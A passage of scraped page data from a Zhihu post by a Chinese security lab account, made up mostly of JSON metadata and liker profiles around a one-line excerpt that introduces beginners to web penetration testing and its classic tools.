u002Fp\u003E\u003Cp\u003E注:本文属合天智汇原创保护文章,未经允许,禁止转载!\u003C\u002Fp\u003E&,&updated&:new Date(&T05:36:13.000Z&),&canComment&:false,&commentPermission&:&anyone&,&commentCount&:12,&collapsedCount&:0,&likeCount&:60,&state&:&published&,&isLiked&:false,&slug&:&&,&lastestTipjarors&:[],&isTitleImageFullScreen&:false,&rating&:&none&,&titleImage&:&&,&links&:{&comments&:&\u002Fapi\u002Fposts\u002F2Fcomments&},&reviewers&:[],&topics&:[{&url&:&https:\u002F\u002Fwww.zhihu.com\u002Ftopic\u002F&,&id&:&&,&name&:&网络安全&},{&url&:&https:\u002F\u002Fwww.zhihu.com\u002Ftopic\u002F&,&id&:&&,&name&:&信息安全&},{&url&:&https:\u002F\u002Fwww.zhihu.com\u002Ftopic\u002F&,&id&:&&,&name&:&Web 开发&}],&adminClosedComment&:false,&titleImageSize&:{&width&:0,&height&:0},&href&:&\u002Fapi\u002Fposts\u002F&,&excerptTitle&:&&,&tipjarState&:&activated&,&tipjarTagLine&:&真诚赞赏,手留余香&,&sourceUrl&:&&,&pageCommentsCount&:12,&tipjarorCount&:0,&annotationAction&:[],&hasPublishingDraft&:false,&snapshotUrl&:&&,&publishedTime&:&T13:36:13+08:00&,&url&:&\u002Fp\u002F&,&lastestLikers&:[{&bio&:&电子工程师&,&isFollowing&:false,&hash&:&b1fdd40ce66aa0b5d30d5&,&uid&:024700,&isOrg&:false,&slug&:&li-yi-57-57&,&isFollowed&:false,&description&:&春有百花,秋有月;夏有凉风,冬有雪……&,&name&:&李毅&,&profileUrl&:&https:\u002F\u002Fwww.zhihu.com\u002Fpeople\u002Fli-yi-57-57&,&avatar&:{&id&:&30e2d9dcca669cfac7bb99&,&template&:&https:\u002F\u002Fpic2.zhimg.com\u002F{id}_{size}.jpg&},&isOrgWhiteList&:false,&isBanned&:false},{&bio&:&学生&,&isFollowing&:false,&hash&:&be59f401dcd0f85628eee8f&,&uid&:823900,&isOrg&:false,&slug&:&yang-jin-neng-17&,&isFollowed&:false,&description&:&gakki老公&,&name&:&kasumi系&,&profileUrl&:&https:\u002F\u002Fwww.zhihu.com\u002Fpeople\u002Fyang-jin-neng-17&,&avatar&:{&id&:&v2-aedcc&,&template&:&https:\u002F\u002Fpic1.zhimg.com\u002F{id}_{size}.jpg&},&isOrgWhiteList&:false,&isBanned&:false},{&bio&:&为鬼代言&,&isFollowing&:false,&hash&:&8d5e77d21d52d7fdfcc81&,&uid&:115600,&isOrg&:false,&slug&:&li-jin-liang-83-53&,&isFollowed&:false,&description&:&&,&name&:&李金亮&,&profileUrl&:&https:\u002F\u002Fwww.zhihu.com\u002Fpeople\u002Fli-jin-liang-83-53&,&avatar&:{&id&:&da8e974dc&,&template&:&https:\u002F\u002Fpic4.zhimg.com\u002F{id}_{size}.jpg&},&isOrgWhiteList&:false,&isBanned&:false},{&bio&:&一个平凡无奇的高中男生&,&isFollowing&:false,&hash&:&77219dded7c17ec4b63acac&,&uid&:68,&isOrg&:false,&slug&:&DixCouleur&,&isFollowed&:false,&description&:&&,&name&:&十颜&,&profileUrl&:&https:\u002F\u002Fwww.zhihu.com\u002Fpeople\u002FDixCouleur&,&avatar&:{&id&:&v2-97f84dba13fb578f46c6bcf&,&template&:&https:\u002F\u002Fpic1.zhimg.com\u002F{id}_{size}.jpg&},&isOrgWhiteList&:false,&isBanned&:false},{&bio&:&知乎编程组创建者,管理层人员\u002F\u002F程序员,c++爱好者,要脸&,&isFollowing&:false,&hash&:&33fbe85d1ae6caaffd622&,&uid&:164700,&isOrg&:false,&slug&:&aixiaodedoubi-1&,&isFollowed&:false,&description&:&KindleHelper第二作者:https:\u002F\u002Fgithub.com\u002Fyh\u002FKindleHelper c#程序员,对图形方面、网络方面和插件式软件\u002F数据库有浓厚兴趣,喜欢写代码,爱提交代码。有管理经验,不再中二。老的中二病历史已无法清除,请见谅。犯了很多错误,正在改正。遵守开源协议,坚持开源精神,办好每一个repo。&,&name&:&爱笑的逗逼&,&profileUrl&:&https:\u002F\u002Fwww.zhihu.com\u002Fpeople\u002Faixiaodedoubi-1&,&avatar&:{&id&:&v2-9cd9ddcfec344b8eb8a379c&,&template&:&https:\u002F\u002Fpic2.zhimg.com\u002F{id}_{size}.jpg&},&isOrgWhiteList&:false,&isBanned&:false}],&summary&:&\u003Cimg src=\&https:\u002F\u002Fpic2.zhimg.com\u002Fv2-2aef2bx112.jpg\& data-rawwidth=\&554\& data-rawheight=\&402\& class=\&origin_image inline-img zh-lightbox-thumb\& data-original=\&https:\u002F\u002Fpic2.zhimg.com\u002Fv2-2aef2b4622f1_r.jpg\&\u003E\u003Cb\u003E0x01\u003C\u002Fb\u003E本篇文章旨在给小白白们做一次有关web渗透的科普,其中涉及到的套路、工具可能在如今XX狗、XX盾当道的社会已不再适用,但是其中涉及的思想永远不会过时,其中的工具如菜刀等更是经典之作,即使发布已经10余年认识现在渗透\u003Cb\u003E\u003Ca href=\&http:\u002F\u002Flib.csdn.net\u002Fbase\u002Fsoftwaretest\&\u003E测试\u003C\u002Fa\u003E\u003C\u002Fb\u003E网站的不可或缺的利器之一…&,&reviewingCommentsCount&:0,&meta&:{&previous&:null,&next&:null},&annotationDetail&:null,&commentsCount&:12,&likesCount&:60,&FULLINFO&:true}},&User&:{&chu-shi-wei-xia&:{&isFollowed&:false,&name&:&初识微夏&,&headline&:&合天网安实验室&,&avatarUrl&:&https:\u002F\u002Fpic3.zhimg.com\u002Fv2-bd8f3becf13_s.jpg&,&isFollowing&:false,&type&:&people&,&slug&:&chu-shi-wei-xia&,&bio&:&合天网安实验室(www.hetianlab.com)&,&hash&:&8f00d0c687dda7afb59deff&,&uid&:031500,&isOrg&:false,&description&:&合天网安实验室&,&badge&:{&identity&:null,&bestAnswerer&:null},&profileUrl&:&https:\u002F\u002Fwww.zhihu.com\u002Fpeople\u002Fchu-shi-wei-xia&,&avatar&:{&id&:&v2-bd8f3becf13&,&template&:&https:\u002F\u002Fpic3.zhimg.com\u002F{id}_{size}.jpg&},&isOrgWhiteList&:false,&isBanned&:false}},&Comment&:{},&favlists&:{}},&me&:{},&global&:{&experimentFeatures&:{&ge3&:&ge3_9&,&ge2&:&ge2_1&,&growthSearch&:&s2&,&sEI&:&c&,&nwebQAGrowth&:&experiment&,&qawebRelatedReadingsContentControl&:&close&,&liveStore&:&ls_a2_b2_c1_f2&,&nwebSearch&:&nweb_search_heifetz&,&rt&:&y&,&isOffice&:&false&,&enableTtsPlay&:&post&,&newLiveFeedMediacard&:&new&,&newMobileAppHeader&:&true&,&androidPassThroughPush&:&all&,&hybridZhmoreVideo&:&yes&,&nwebGrowthPeople&:&default&,&nwebSearchSuggest&:&default&,&qrcodeLogin&:&qrcode&,&enableVoteDownReasonMenu&:&enable&,&isShowUnicomFreeEntry&:&unicom_free_entry_off&,&newMobileColumnAppheader&:&new_header&,&androidDbRecommendAction&:&open&,&biu&:&1&,&androidDbFeedHashTagStyle&:&button&,&appStoreRateDialog&:&close&,&default&:&None&,&isNewNotiPanel&:&no&,&biua&:&1&,&zcmLighting&:&zcm&,&adR&:&b&,&wechatShareModal&:&wechat_share_modal_show&,&growthBanner&:&default&,&androidProfilePanel&:&panel_b&}},&columns&:{&next&:{}},&columnPosts&:{},&columnSettings&:{&colomnAuthor&:[],&uploadAvatarDetails&:&&,&contributeRequests&:[],&contributeRequestsTotalCount&:0,&inviteAuthor&:&&},&postComments&:{},&postReviewComments&:{&comments&:[],&newComments&:[],&hasMore&:true},&favlistsByUser&:{},&favlistRelations&:{},&promotions&:{},&switches&:{&couldSetPoster&:false},&draft&:{&titleImage&:&&,&titleImageSize&:{},&isTitleImageFullScreen&:false,&canTitleImageFullScreen&:false,&title&:&&,&titleImageUploading&:false,&error&:&&,&content&:&&,&draftLoading&:false,&globalLoading&:false,&pendingVideo&:{&resource&:null,&error&:null}},&drafts&:{&draftsList&:[],&next&:{}},&config&:{&userNotBindPhoneTipString&:{}},&recommendPosts&:{&articleRecommendations&:[],&columnRecommendations&:[]},&env&:{&edition&:{&baidu&:false,&yidianzixun&:false,&qqnews&:false},&isAppView&:false,&appViewConfig&:{&content_padding_top&:128,&content_padding_bottom&:56,&content_padding_left&:16,&content_padding_right&:16,&title_font_size&:22,&body_font_size&:16,&is_dark_theme&:false,&can_auto_load_image&:true,&app_info&:&OS=iOS&},&isApp&:false,&userAgent&:{&ua&:&Mozilla\u002F5.0 (compatible, MSIE 11, Windows NT 6.3; Trident\u002F7.0; rv:11.0) like Gecko&,&browser&:{&name&:&IE&,&version&:&11&,&major&:&11&},&engine&:{&version&:&7.0&,&name&:&Trident&},&os&:{&name&:&Windows&,&version&:&8.1&},&device&:{},&cpu&:{}}},&message&:{&newCount&:0},&pushNotification&:{&newCount&:0}}}

我要回帖

更多关于 web渗透测试工程师 的文章

更多推荐

版权声明:文章内容来源于网络,版权归原作者所有,如有侵权请点击这里与我们联系,我们将及时删除。

点击添加站长微信